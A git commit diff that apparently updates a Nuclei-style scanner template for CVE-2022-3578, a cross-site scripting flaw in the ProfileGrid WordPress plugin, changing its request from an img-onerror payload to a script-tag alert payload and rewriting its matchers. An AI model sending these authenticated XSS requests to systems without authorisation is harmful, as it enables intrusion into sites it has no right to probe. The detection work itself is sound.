Update CVE-2022-3578.yaml

patch-1
Ritik Chaddha 2022-11-16 15:01:54 +05:30 committed by GitHub
parent 9b3a991777
commit 57f00c877d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 9 additions and 18 deletions

View File

@ -1,7 +1,7 @@
id: CVE-2022-3578
info:
name: ProfileGrid < 5.1.1 - Reflected Cross-Site Scripting
name: ProfileGrid < 5.1.1 - Cross-Site Scripting
author: theamanrawat
severity: medium
description: |
@ -12,7 +12,7 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2022-3578
metadata:
verified: true
tags: cve,cve2022,wp-plugin,wp,xss,authenticated,wpscan,wordpress,profilegrid-user-profiles-groups-and-communities
tags: cve,cve2022,wp-plugin,wp,wordpress,xss,profilegrid,authenticated
requests:
- raw:
@ -24,25 +24,16 @@ requests:
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=pm_add_group&id="><img+src+onerror%3Dalert(document.domain)> HTTP/1.1
GET /wp-admin/admin.php?page=pm_add_group&id="><script>alert%28document.domain%29<%2Fscript> HTTP/1.1
Host: {{Hostname}}
req-condition: true
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- '<img src onerror=alert(document.domain)>'
- 'Extension Options'
- type: dsl
dsl:
- 'contains(all_headers_2, "text/html")'
- 'status_code_2 == 200'
- 'contains(body_2, "Extension Options")'
- 'contains(body_2, "<script>alert(document.domain)</script>&tab")'
condition: and
- type: word
part: header_2
words:
- text/html
- type: status
status:
- 200